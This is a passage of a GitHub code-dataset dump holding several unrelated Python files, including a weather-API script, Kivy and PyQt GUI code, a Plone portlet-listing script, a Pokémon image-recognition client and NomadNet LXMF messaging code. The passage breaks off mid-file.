import load_dotenv\nfrom os import getenv\nload_dotenv()\n\n#8a27d483ee8c053eb537a4b7388dcb72\n# p = getenv('passw')\n# a = getenv('login')\n# b = getenv('email')\n# print(p, a, b)\n\n# weatheApi =getenv('WeatherApi')\n# # city = input('Vvvedite nazvanie goroda: ')\n# city = \"Almaty\"\n# url = f'https://api.openweathermap.org/data/2.5/weather?q={city}&appid={weatheApi}&units=metric'\n\n# response = requests.get(url)\n# data = response.json()\n# print(data)\n\n# d5bb44d0fa8e39e2339c9019d833d826\nimport requests\nfrom datetime import datetime\n# from pprint import pprint\nfrom os import getenv, system\nfrom dotenv import load_dotenv\nload_dotenv()\n\nWEATHER_API = getenv('WEATHER_API')\n# city = input(\"Введите газвание города: \")\n\n\ndef weather_service(get_city,API=WEATHER_API):\n \"\"\"Ваш бот-метеоролог мгновенно показывает погоду в любом городе,\n предоставляя актуальную информацию о температуре воздуха, влажности и вероятности дождя. \n Это помогает планировать дела эффективнее и быть в курсе погодных событий \n в режиме реального времени.\n\n get_city = 'Almaty'\n API = Weather_API\n\n weather_service(get_city :str, API=WEATHER_API) -> str:\n\n \"\"\"\n\n url = f'https://api.openweathermap.org/data/2.5/weather?q={get_city}&appid={API}&units=metric'\n\n response = requests.get(url)\n data = response.json()\n\n # pprint(data)\n print(len(data))\n\n Pr_day = datetime.fromtimestamp(data['sys']['sunset']) - datetime.fromtimestamp(data['sys']['sunrise'])\n information = f\"\"\"Pogoda Daniyar\n Strana: {data['sys']['country']}\n Nazvanie goroda: {data['name']} {data['weather'][0]['description']} {data['clouds']['all']}%\n Temperature : {data['main']['temp']}°C\n Oshushaetsya : {data['main']['feels_like']}°C\n vlazhnost : {data['main']['humidity']}%\n davlenie vozduha : {data['main']['pressure']} gPa\n skorost vetra : {data['wind']['speed']}m/s\n Napravlenie : {data['wind']['deg']}°\n Voshod solnca : {datetime.fromtimestamp(data['sys']['sunrise'])}\n Prodolzhitelnost dnya : {Pr_day}\n Zakat solnca : {datetime.fromtimestamp(data['sys']['sunset'])}\n \"\"\"\n\n return(information)\nprint(weather_service(\"Almaty\"))","repo_name":"Daniyarkenn/Weather_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113140348","text":"import tkinter as Tk\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport countryGUI\nimport mlSandbox\nimport GuiOption\n\nclass Historic3DGui(countryGUI.CountryGui):\n \n def __init__(self, country_data):\n self.options3d = {}\n self.options3d[1] = GuiOption.Option(\"Population\", \"pop\")\n self.options3d[2] = GuiOption.Option(\"GDP per Capita\", \"gdpPercap\")\n self.options3d[3] = GuiOption.Option(\"Life Expectancy\", \"lifeExp\")\n\n super().__init__(country_data, None, \"year\")\n \n def plotData(self):\n \n ax = plt.axes(projection =\"3d\") \n ax.set_xlabel(self.xAxisName)\n ax.set_ylabel(self.options3d[2].displayName)\n ax.set_zlabel(self.options3d[3].displayName)\n plt.title(\" Time, Gdp Per Capita, and Life Expectancy 3D\")\n \n for country in self.countryContainer:\n country = self.dataFrame.loc[country]\n xData = list(country[self.xAxisName])\n yData = list(country[self.options3d[2].pandasName])\n zData = list(country[self.options3d[3].pandasName])\n ax.scatter3D(xData, yData, zData, cmap = 'hsv', label = country.index[0])\n \n plt.legend(loc = \"upper left\") \n plt.show()\n\ndef main():\n country_data = mlSandbox.getCountryData()\n gui = Historic3DGui(country_data)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Michael-Paluda/mlSandbox","sub_path":"Historic3DDataViewer.py","file_name":"Historic3DDataViewer.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4885385646","text":"from kivy.lang import Builder\nfrom kivy.metrics import dp\nfrom kivy.properties import ObjectProperty, StringProperty, BooleanProperty\n\nfrom configs.color import OneUIColors\nfrom features.browser_rule import data\nfrom features.browser_rule.controller import BrowserRuleController\nfrom widgets.layout import OneUIBox, OneUIGrid\nfrom widgets.panel import OneUIExpandablePanel\nfrom widgets.toolbar import OneUITopBar\n\nBuilder.load_file(\"features/browser_rule/add/ui.kv\")\n\n\nclass OneUIBrowserRule(OneUIBox):\n rule = ObjectProperty()\n saved = BooleanProperty(force_dispatch=True)\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.id = None\n self.orientation = 'vertical'\n self.spacing = 15\n self.md_bg_color = OneUIColors.PageBackground.value\n\n def add_response_logics(self, response: data.BrowserRuleResponse = data.BrowserRuleResponse()):\n if self.ids.rule_logics:\n _widget = OneUIRuleLogicWidget()\n _widget.response = response\n\n body_container = OneUIExpandablePanel()\n head_panel = OneUIBrowserResponseHeaderPanel()\n head_panel.toggle = lambda: body_container.toggle_body_content()\n head_panel.remove = lambda: self.remove_response(body_container)\n head_panel.on_release = lambda: body_container.toggle_body_content()\n _widget.ids.tags.bind(text=head_panel.ids.browser_rule_response_header.setter(\"text\"))\n\n body_container.head = head_panel\n body_container.bodies = [_widget]\n body_container.adaptive_height = True\n self.ids.rule_logics.add_widget(body_container)\n\n def remove_response(self, child):\n self.ids.rule_logics.remove_widget(child)\n\n def save(self):\n BrowserRuleController.save(self.data)\n self.saved = True\n\n def on_rule(self, _, rule: data.Rule):\n self.id = rule.id\n self.ids.name.text = rule.name\n self.ids.description.text = rule.description\n self.ids.source_type.text = rule.source_type\n self.ids.operator.text = rule.operator\n self.ids.source.text = rule.source\n self.ids.is_enabled.active = rule.is_enabled\n self.ids.rule_logics.clear_widgets()\n for response in rule.responses:\n self.add_response_logics(response)\n\n @property\n def data(self) -> data.Rule:\n have_responses = len(self.ids.rule_logics.children) > 0\n _rule = data.Rule(\n id=self.id,\n name=self.ids.name.text,\n description=self.ids.description.text,\n source_type=self.ids.source_type.text,\n operator=self.ids.operator.text,\n source=self.ids.source.text,\n is_enabled=self.ids.is_enabled.active\n )\n _responses = [response.data for response in self.ids.rule_logics.children[0].children\n if (isinstance(response, OneUIRuleLogicWidget))] if have_responses else []\n _rule.responses = _responses\n return _rule\n\n\nclass OneUIRuleLogicWidget(OneUIGrid):\n response = ObjectProperty(data.BrowserRuleResponse())\n\n def __init__(self, response: data.BrowserRuleResponse = data.BrowserRuleResponse()):\n super(OneUIRuleLogicWidget, self).__init__()\n self.padding = dp(25)\n self.spacing = 20\n self.md_bg_color = OneUIColors.Background.value\n self.adaptive_height = True\n self.response = response\n\n def on_response(self, _, response: data.BrowserRuleResponse):\n self.ids.data_source_type.text = response.data_source_type\n self.ids.http_method.text = response.http_method\n self.ids.tags.text = response.tags\n self.ids.delay.text = str(response.delay)\n self.ids.is_logic_enabled.active = response.is_logic_enabled\n for _filter in response.filters:\n self.add_filter(_filter)\n\n def update_control(self, source_type: str):\n self.ids.browser_rule_data_widget_handler.clear_widgets()\n if source_type == 'r':\n self.ids.browser_rule_data_widget_handler.add_widget(OneUIBrowserRuleDataLink())\n if source_type == 'd':\n self.ids.browser_rule_data_widget_handler.add_widget(OneUIBrowserRuleData())\n\n def add_filter(self, _filter: data.RequestFilter = data.RequestFilter()) -> None:\n if self.ids:\n _widget = OneUIRuleLogicFilterWidget()\n _widget.filter = _filter\n _widget.remove = lambda x: self.remove_filter(_widget)\n self.ids.filters.add_widget(_widget)\n\n def remove_filter(self, child) -> None:\n if self.ids:\n self.ids.filters.remove_widget(child)\n\n @property\n def data(self) -> data.BrowserRuleResponse:\n\n have_data = len(self.ids.browser_rule_data_widget_handler.children) > 0\n return data.BrowserRuleResponse(\n delay=int(self.ids.delay.text),\n data_source_type=self.ids.data_source_type.text,\n http_method=self.ids.http_method.text,\n is_logic_enabled=self.ids.is_logic_enabled.active,\n tags=self.ids.tags.text,\n filters=[_filter.data for _filter in self.ids.filters.children],\n data=self.ids.browser_rule_data_widget_handler.children[0].data if have_data else data.MockData()\n )\n\n\nclass OneUIRuleLogicFilterWidget(OneUIGrid):\n filter = ObjectProperty()\n\n remove = None\n\n def on_release(self):\n if self.remove:\n try:\n self.remove(self)\n finally:\n pass\n\n def on_filter(self, _, _filter: data.RequestFilter):\n self.ids.filter_by.text = _filter.filter_by\n self.ids.key.text = _filter.key\n self.ids.value.text = _filter.value\n\n @property\n def data(self) -> data.RequestFilter:\n return data.RequestFilter(\n filter_by=self.ids.filter_by.text,\n key=self.ids.key.text,\n value=self.ids.value.text)\n\n\nclass OneUIBrowserResponseHeaderPanel(OneUITopBar):\n\n def remove(self):\n pass\n\n def toggle(self):\n pass\n\n\nclass OneUIBrowserRuleDataLink(OneUIBox):\n link = StringProperty()\n\n def on_link(self, _, val: str):\n self.ids.link.text = val\n\n @property\n def data(self) -> data.MockData:\n return data.MockData(link=self.ids.link.text)\n\n\nclass OneUIBrowserRuleData(OneUIBox):\n mock_data = ObjectProperty(data.MockData())\n\n def __init__(self, **kwargs):\n super(OneUIBrowserRuleData, self).__init__(**kwargs)\n self.adaptive_height = True\n\n def on_mock_data(self, _, mock_data: data.MockData):\n self.ids.content.text = mock_data.content\n self.ids.link.text = mock_data.link\n self.ids.status.text = mock_data.status\n self.ids.content_type.text = mock_data.content_type\n self.ids.cloud_store_permission = True if mock_data.cloud_store_permission == \"a\" else False\n for header in mock_data.headers:\n self.add_header(header=header)\n\n def add_header(self, header: data.DataHeader = data.DataHeader()) -> None:\n _widget = OneUIBrowserRuleDataHeader()\n _widget.header = header\n _widget.remove = lambda x: self.remove(x)\n if self.ids:\n self.ids.browser_rule_mock_headers.add_widget(_widget)\n\n def remove(self, child):\n self.ids.browser_rule_mock_headers.remove_widget(child)\n\n @property\n def data(self) -> data.MockData:\n return data.MockData(\n content=self.ids.content.text,\n link=self.ids.link.text,\n status=self.ids.status.text,\n content_type=self.ids.content_type.text,\n headers=[_header.data for _header in self.ids.browser_rule_mock_headers.children],\n cloud_store_permission=\"a\" if self.ids.cloud_store_permission.active else \"na\")\n\n\nclass OneUIBrowserRuleDataHeader(OneUIBox):\n header = ObjectProperty()\n\n def remove(self, x):\n pass\n\n def on_header(self, _, header: data.DataHeader):\n self.ids.key.text = header.key\n self.ids.value.text = header.value\n\n @property\n def data(self) -> data.DataHeader:\n return data.DataHeader(key=self.ids.key.text, value=self.ids.value.text)\n","repo_name":"swavan/server-oneui","sub_path":"features/browser_rule/add/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13839290113","text":"import sqlite3\nfrom utils import display\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import uic\n\n# Classe permettant d'afficher la fenêtre de visualisation des données\n\n\nclass AppFctDev1Partie3(QDialog):\n\n # Constructeur\n def __init__(self, data: sqlite3.Connection):\n super(QDialog, self).__init__()\n self.ui = uic.loadUi(\"gui/fct_dev_1_3.ui\", self)\n self.data = data\n self.ui.cbE.currentTextChanged.connect(self.on_combobox_changed)\n self.ui.cbES.currentTextChanged.connect(self.on_combobox_changed2)\n self.ui.cbM.currentTextChanged.connect(self.on_combobox_changed3)\n self.ui.bvalider.clicked.connect(self.valider)\n self.ui.bsupprimer.clicked.connect(self.supprimer)\n self.ui.bconfirmer.clicked.connect(self.confirmer)\n self.setData()\n\n # On met à jour l'affichage avec les données actuellement présentes dans la base\n self.refreshResult()\n\n def confirmer(self):\n if self.ui.cbM.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Merci de sélectionner 1 sportif\")\n else:\n try:\n p = int(self.ui.cbM.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"UPDATE LesSportifs SET prenomSp = ?, nomSp = ? WHERE numSp = ?\",(self.ui.Eprenom.text(),self.ui.Enom.text(),p))\n self.data.commit()\n self.refreshResult()\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de update dans LesSportifs' : \" + repr(e))\n def supprimer(self):\n if self.ui.cbES.currentText() == \"\" or self.ui.cbIS.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Merci de sélectionner 1 participant et 1 épreuve\")\n else:\n try:\n p = int(self.ui.cbIS.currentText())\n ep = int(self.ui.cbES.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"DELETE FROM LesInscriptions WHERE numIn = ? and numEp = ?\",(p,ep))\n self.data.commit()\n self.refreshResult()\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de supprimer dans LesParticipants' : \" + repr(e))\n def valider(self):\n if self.ui.cbE.currentText() == \"\" or self.ui.cbI.currentText() == \"\":\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Merci de sélectionner 1 participant et 1 épreuve\")\n else:\n try:\n p = int(self.ui.cbI.currentText())\n ep = int(self.ui.cbE.currentText().split('[')[1].split(']')[0])\n cursor = self.data.cursor()\n cursor.execute(\"INSERT INTO LesInscriptions VALUES (?,?)\",(p,ep))\n self.data.commit()\n self.refreshResult()\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible d'insert dans LesParticipants' : \" + repr(e))\n def on_combobox_changed(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"WITH Equipes AS(\"\n \" SELECT numEq as num FROM LesEquipes\"\n \" EXCEPT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Sportifs AS(\"\n \" SELECT numSp as num FROM LesSportifs\"\n \" EXCEPT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Total AS (\"\n \" SELECT num FROM Equipes\"\n \" UNION\"\n \" SELECT num FROM Sportifs\"\n \")SELECT * FROM Total\", (n,n))\n display.refreshGenericCombo(self.ui.cbI, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def on_combobox_changed2(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"WITH Equipes AS(\"\n \" SELECT numEq as num FROM LesEquipes\"\n \" INTERSECT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Sportifs AS(\"\n \" SELECT numSp as num FROM LesSportifs\"\n \" INTERSECT\"\n \" SELECT numIn as num FROM LesInscriptions WHERE numEp = ?\"\n \"), Total AS (\"\n \" SELECT num FROM Equipes\"\n \" UNION\"\n \" SELECT num FROM Sportifs\"\n \")SELECT * FROM Total\", (n,n))\n display.refreshGenericCombo(self.ui.cbIS, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def on_combobox_changed3(self, value):\n n = int(value.split('[')[1].split(']')[0])\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numSp, pays, nomSp, prenomSp FROM LesSportifs WHERE numSp = ? or numSp = ?\",(n,n))\n\n for row in result:\n self.ui.Enum.setText(str(row[0]))\n self.ui.Epays.setText(str(row[1]))\n self.ui.Enom.setText(str(row[2]))\n self.ui.Eprenom.setText(str(row[3]))\n\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de récuperer les Participants : \" + repr(e))\n\n def setData(self):\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"SELECT '['||numEp||']'||nomEp||' ('||formeEp||' '||categorieEp||')' FROM LesEpreuves\")\n display.refreshGenericCombo(self.ui.cbE, result)\n r2 = cursor.execute(\n \"SELECT '['||numEp||']'||nomEp||' ('||formeEp||' '||categorieEp||')' FROM LesEpreuves\")\n display.refreshGenericCombo(self.ui.cbES, r2)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3, \"Impossible de récuperer les epreuves : \" + repr(e))\n display.refreshLabel(self.ui.label_fct_dev_1_3S, \"Impossible de récuperer les epreuves : \" + repr(e))\n\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\n \"SELECT '['||numSp||']'||nomSp||' '||prenomSp FROM LesSportifs\")\n display.refreshGenericCombo(self.ui.cbM, result)\n except Exception as e:\n display.refreshLabel(self.ui.label_fct_dev_1_3M, \"Impossible de récuperer les sportifs : \" + repr(e))\n ####################################################################################################################\n # Méthodes permettant de rafraichir les différentes tables\n ####################################################################################################################\n\n # Fonction de mise à jour de l'affichage d'une seule table\n @pyqtSlot()\n def refreshResult(self):\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numEp, numIn FROM LesInscriptions ORDER BY numEp, numIn\")\n display.refreshGenericData(self.ui.table_fct_dev, result)\n r2 = cursor.execute(\"SELECT numEp, numIn FROM LesInscriptions ORDER BY numEp, numIn\")\n display.refreshGenericData(self.ui.table_fct_dev_S, r2)\n except Exception as e:\n self.ui.table_fct_dev.setRowCount(0)\n self.ui.table_fct_dev_S.setRowCount(0)\n\n try:\n cursor = self.data.cursor()\n result = cursor.execute(\"SELECT numSp, nomSp, prenomSp, pays, categorieSp, dateNaisSP FROM LesSportifs\")\n display.refreshGenericData(self.ui.table_fct_dev_M, result)\n except Exception as e:\n self.ui.table_fct_dev_M.setRowCount(0)","repo_name":"c-guill/Projet-CEBD","sub_path":"actions/v1_action_fct_dev_1_partie_3.py","file_name":"v1_action_fct_dev_1_partie_3.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42896140118","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script list portlet assigments on a site.\n\nRun the script using the following command line:\n\n.. code-block:: console\n\n $ bin/instance -O Plone run scripts/list_portlets.py\n\nThe -O parameter is used to specify the id of your Plone site.\n\n\"\"\"\nfrom __future__ import print_function\nfrom plone import api\nfrom plone.portlets.interfaces import ILocalPortletAssignable\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\nfrom plone.portlets.interfaces import IPortletManager\nfrom zope.component import getMultiAdapter\nfrom zope.component import getUtility\n\n\ndef get_valid_objects():\n \"\"\"Generate a list of objects associated with valid brains.\"\"\"\n catalog = api.portal.get_tool('portal_catalog')\n results = catalog()\n print('Found {0} objects in the catalog'.format(len(results)))\n for b in api.content.find():\n try:\n obj = b.getObject()\n except (AttributeError, KeyError):\n obj = None\n\n if obj is None: # warn on broken entries in the catalog\n msg = 'Invalid object reference in the catalog: {0}'\n print(msg.format(b.getPath()))\n continue\n\n yield obj\n\n\ndef list_portlet_assignments(obj):\n \"\"\"List all portlet assignments on a given object.\"\"\"\n if not ILocalPortletAssignable.providedBy(obj):\n return\n\n print('object: {0}'.format(obj))\n for name in ('plone.leftcolumn', 'plone.rightcolumn'):\n manager = getUtility(IPortletManager, name=name)\n mapping = getMultiAdapter((obj, manager), IPortletAssignmentMapping)\n items = list(mapping.items())\n if not items:\n continue\n\n print('├─ {0}'.format(name))\n for k, v in items:\n print('├─── {0} ({1})'.format(k, v))\n\n\n# list portlets assigned to catalogued objects\nfor obj in get_valid_objects():\n list_portlet_assignments(obj)\n\n# list portlets assigned to portal root\nlist_portlet_assignments(api.portal.get())\n","repo_name":"plonegovbr/portal.buildout","sub_path":"scripts/list_portlets.py","file_name":"list_portlets.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"23806759521","text":"import requests\r\nimport base64\r\n\r\nwith open('input/images.jpeg', 'rb') as f:\r\n imagem_bytes = f.read()\r\n\r\nimagem_base64 = base64.b64encode(imagem_bytes).decode('utf-8')\r\n\r\npayload = {\r\n 'body': imagem_base64\r\n}\r\n\r\nurl = 'https://yhdf1b8upg.execute-api.us-east-1.amazonaws.com/pikomonstage'\r\nresponse = requests.post(url, json=payload)\r\n\r\nprint(\"Status Code:\", response.status_code)\r\n\r\nif response.text == '[]':\r\n print(\"Pokemon não reconhecido\")\r\nelse:\r\n print(\"Pokemon:\", response.text.replace('[\"', \"\").replace('\"]', \"\"))","repo_name":"lucaslima433/PISI4-Pokedex","sub_path":"RST.py","file_name":"RST.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5042349896","text":"import os\nimport RNS\nimport LXMF\nimport shutil\nimport nomadnet\nfrom nomadnet.Directory import DirectoryEntry\n\nclass Conversation:\n cached_conversations = {}\n unread_conversations = {}\n created_callback = None\n\n aspect_filter = \"lxmf.delivery\"\n @staticmethod\n def received_announce(destination_hash, announced_identity, app_data):\n app = nomadnet.NomadNetworkApp.get_shared_instance()\n\n if not destination_hash in app.ignored_list:\n destination_hash_text = RNS.hexrep(destination_hash, delimit=False)\n # Check if the announced destination is in\n # our list of conversations\n if destination_hash_text in [e[0] for e in Conversation.conversation_list(app)]:\n if app.directory.find(destination_hash):\n if Conversation.created_callback != None:\n Conversation.created_callback()\n else:\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n # Add the announce to the directory announce\n # stream logger\n app.directory.lxmf_announce_received(destination_hash, app_data)\n \n else:\n RNS.log(\"Ignored announce from \"+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)\n\n @staticmethod\n def query_for_peer(source_hash):\n try:\n RNS.Transport.request_path(bytes.fromhex(source_hash))\n except Exception as e:\n RNS.log(\"Error while querying network for peer identity. The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n @staticmethod\n def ingest(lxmessage, app, originator = False, delegate = None):\n if originator:\n source_hash = lxmessage.destination_hash\n else:\n source_hash = lxmessage.source_hash\n \n source_hash_path = RNS.hexrep(source_hash, delimit=False)\n\n conversation_path = app.conversationpath + \"/\" + source_hash_path\n\n if not os.path.isdir(conversation_path):\n os.makedirs(conversation_path)\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n ingested_path = lxmessage.write_to_directory(conversation_path)\n\n if RNS.hexrep(source_hash, delimit=False) in Conversation.cached_conversations:\n conversation = Conversation.cached_conversations[RNS.hexrep(source_hash, delimit=False)]\n conversation.scan_storage()\n\n if not source_hash in Conversation.unread_conversations:\n Conversation.unread_conversations[source_hash] = True\n try:\n dirname = RNS.hexrep(source_hash, delimit=False)\n open(app.conversationpath + \"/\" + dirname + \"/unread\", 'a').close()\n except Exception as e:\n pass\n\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n return ingested_path\n\n @staticmethod\n def conversation_list(app):\n conversations = []\n for dirname in os.listdir(app.conversationpath):\n if len(dirname) == RNS.Identity.TRUNCATED_HASHLENGTH//8*2 and os.path.isdir(app.conversationpath + \"/\" + dirname):\n try:\n source_hash_text = dirname\n source_hash = bytes.fromhex(dirname)\n app_data = RNS.Identity.recall_app_data(source_hash)\n display_name = app.directory.display_name(source_hash)\n\n unread = False\n if source_hash in Conversation.unread_conversations:\n unread = True\n elif os.path.isfile(app.conversationpath + \"/\" + dirname + \"/unread\"):\n Conversation.unread_conversations[source_hash] = True\n unread = True\n\n if display_name == None and app_data:\n display_name = app_data.decode(\"utf-8\")\n\n if display_name == None:\n sort_name = \"\"\n else:\n sort_name = display_name\n \n trust_level = app.directory.trust_level(source_hash, display_name)\n \n entry = (source_hash_text, display_name, trust_level, sort_name, unread)\n conversations.append(entry)\n\n except Exception as e:\n RNS.log(\"Error while loading conversation \"+str(dirname)+\", skipping it. The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n conversations.sort(key=lambda e: (-e[2], e[3], e[0]), reverse=False)\n\n return conversations\n\n @staticmethod\n def cache_conversation(conversation):\n Conversation.cached_conversations[conversation.source_hash] = conversation\n\n @staticmethod\n def delete_conversation(source_hash_path, app):\n conversation_path = app.conversationpath + \"/\" + source_hash_path\n\n try:\n if os.path.isdir(conversation_path):\n shutil.rmtree(conversation_path)\n except Exception as e:\n RNS.log(\"Could not remove conversation at \"+str(conversation_path)+\". The contained exception was: \"+str(e), RNS.LOG_ERROR)\n\n def __init__(self, source_hash, app, initiator=False):\n self.app = app\n self.source_hash = source_hash\n self.send_destination = None\n self.messages = []\n self.messages_path = app.conversationpath + \"/\" + source_hash\n self.messages_load_time = None\n self.source_known = False\n self.source_trusted = False\n self.source_blocked = False\n self.unread = False\n\n self.__changed_callback = None\n\n if not RNS.Identity.recall(bytes.fromhex(self.source_hash)):\n RNS.Transport.request_path(bytes.fromhex(source_hash))\n\n self.source_identity = RNS.Identity.recall(bytes.fromhex(self.source_hash))\n\n if self.source_identity:\n self.source_known = True\n self.send_destination = RNS.Destination(self.source_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, \"lxmf\", \"delivery\")\n\n if initiator:\n if not os.path.isdir(self.messages_path):\n os.makedirs(self.messages_path)\n if Conversation.created_callback != None:\n Conversation.created_callback()\n\n self.scan_storage()\n\n self.trust_level = app.directory.trust_level(bytes.fromhex(self.source_hash))\n\n Conversation.cache_conversation(self)\n\n def scan_storage(self):\n old_len = len(self.messages)\n self.messages = []\n for filename in os.listdir(self.messages_path):\n if len(filename) == RNS.Identity.HASHLENGTH//8*2:\n message_path = self.messages_path + \"/\" + filename\n self.messages.append(ConversationMessage(message_path))\n\n new_len = len(self.messages)\n\n if new_len > old_len:\n self.unread = True\n\n if self.__changed_callback != None:\n self.__changed_callback(self)\n\n def purge_failed(self):\n purged_messages = []\n for conversation_message in self.messages:\n if conversation_message.get_state() == LXMF.LXMessage.FAILED:\n purged_messages.append(conversation_message)\n conversation_message.purge()\n\n for purged_message in purged_messages:\n self.messages.remove(purged_message)\n\n def clear_history(self):\n purged_messages = []\n for conversation_message in self.messages:\n purged_messages.append(conversation_message)\n conversation_message.purge()\n\n for purged_message in purged_messages:\n self.messages.remove(purged_message)\n\n def register_changed_callback(self, callback):\n self.__changed_callback = callback\n\n def send(self, content=\"\", title=\"\"):\n if self.send_destination:\n dest = self.send_destination\n source = self.app.lxmf_destination\n desired_method = LXMF.LXMessage.DIRECT\n if self.app.directory.preferred_delivery(dest.hash) == DirectoryEntry.PROPAGATED:\n if self.app.message_router.get_outbound_propagation_node() != None:\n desired_method = LXMF.LXMessage.PROPAGATED\n\n lxm = LXMF.LXMessage(dest, source, content, title=title, desired_method=desired_method)\n lxm.register_delivery_callback(self.message_notification)\n lxm.register_failed_callback(self.message_notification)\n\n if self.app.message_router.get_outbound_propagation_node() != None:\n lxm.try_propagation_on_fail = self.app.try_propagation_on_fail\n\n self.app.message_router.handle_outbound(lxm)\n\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n\n return True\n else:\n RNS.log(\"Destination is not known, cannot create LXMF Message.\", RNS.LOG_VERBOSE)\n return False\n\n def paper_output(self, content=\"\", title=\"\", mode=\"print_qr\"):\n if self.send_destination:\n try:\n dest = self.send_destination\n source = self.app.lxmf_destination\n desired_method = LXMF.LXMessage.PAPER\n\n lxm = LXMF.LXMessage(dest, source, content, title=title, desired_method=desired_method)\n\n if mode == \"print_qr\":\n qr_code = lxm.as_qr()\n qr_tmp_path = self.app.tmpfilespath+\"/\"+str(RNS.hexrep(lxm.hash, delimit=False))\n qr_code.save(qr_tmp_path)\n\n print_result = self.app.print_file(qr_tmp_path)\n os.unlink(qr_tmp_path)\n \n if print_result:\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n\n return print_result\n\n elif mode == \"save_qr\":\n qr_code = lxm.as_qr()\n qr_save_path = self.app.downloads_path+\"/LXM_\"+str(RNS.hexrep(lxm.hash, delimit=False)+\".png\")\n qr_code.save(qr_save_path)\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n return qr_save_path\n\n elif mode == \"save_uri\":\n lxm_uri = lxm.as_uri()+\"\\n\"\n uri_save_path = self.app.downloads_path+\"/LXM_\"+str(RNS.hexrep(lxm.hash, delimit=False)+\".txt\")\n with open(uri_save_path, \"wb\") as f:\n f.write(lxm_uri.encode(\"utf-8\"))\n\n message_path = Conversation.ingest(lxm, self.app, originator=True)\n self.messages.append(ConversationMessage(message_path))\n return uri_save_path\n\n elif mode == \"return_uri\":\n return lxm.as_uri()\n\n except Exception as e:\n RNS.log(\"An error occurred while generating paper message, the contained exception was: \"+str(e), RNS.LOG_ERROR)\n return False\n\n else:\n RNS.log(\"Destination is not known, cannot create LXMF Message.\", RNS.LOG_VERBOSE)\n return False\n\n def message_notification(self, message):\n if message.state == LXMF.LXMessage.FAILED and hasattr(message, \"try_propagation_on_fail\") and message.try_propagation_on_fail:\n RNS.log(\"Direct delivery of \"+str(message)+\" failed. Retrying as propagated message.\", RNS.LOG_VERBOSE)\n message.try_propagation_on_fail = None\n message.delivery_attempts = 0\n del message.next_delivery_attempt\n message.packed = None\n message.desired_method = LXMF.LXMessage.PROPAGATED\n self.app.message_router.handle_outbound(message)\n else:\n message_path = Conversation.ingest(message, self.app, originator=True)\n\n def __str__(self):\n string = self.source_hash\n\n # TODO: Remove this\n # if self.source_identity:\n # if self.source_identity.app_data:\n # # TODO: Sanitise for viewing, or just clean this\n # string += \" | \"+self.source_identity.app_data.decode(\"utf-8\")\n\n return string\n\n\n\nclass ConversationMessage:\n def __init__(self, file_path):\n self.file_path = file_path\n self.loaded = False\n self.timestamp = None\n self.lxm = None\n\n def load(self):\n try:\n self.lxm = LXMF.LXMessage.unpack_from_file(open(self.file_path, \"rb\"))\n self.loaded = True\n self.timestamp = self.lxm.timestamp\n self.sort_timestamp = os.path.getmtime(self.file_path)\n\n if self.lxm.state > 